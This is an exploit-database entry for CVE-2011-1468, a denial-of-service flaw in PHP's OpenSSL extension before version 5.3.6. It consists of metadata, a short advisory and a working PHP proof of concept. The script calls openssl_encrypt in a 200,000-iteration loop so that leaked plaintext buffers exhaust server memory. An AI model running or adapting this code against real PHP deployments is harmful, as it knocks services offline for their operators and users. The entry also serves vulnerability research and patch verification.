PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service
Author: dovbysh
type: dos
platform: php
port:
date_added: 2011-03-08
date_updated: 2014-12-08
verified: 1
codes: CVE-2011-1468;OSVDB-73754
tags:
aliases:
screenshot_url:
application_url:
raw file: 35486.php
source: https://www.securityfocus.com/bid/46977/info

PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension.

Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition.

Versions prior to PHP 5.3.6 are vulnerable.

<?php
// Plaintext and passphrase passed to openssl_encrypt() on every iteration.
$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";
$maxi = 200000;

// Time the loop; on affected versions the plaintext buffer is leaked on each call,
// so memory use grows with the iteration count.
$t = microtime(1);
for ($i = 0; $i < $maxi; $i++) {
    openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
}
$t = microtime(1) - $t;

// Report total time and calls per second.
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";
?>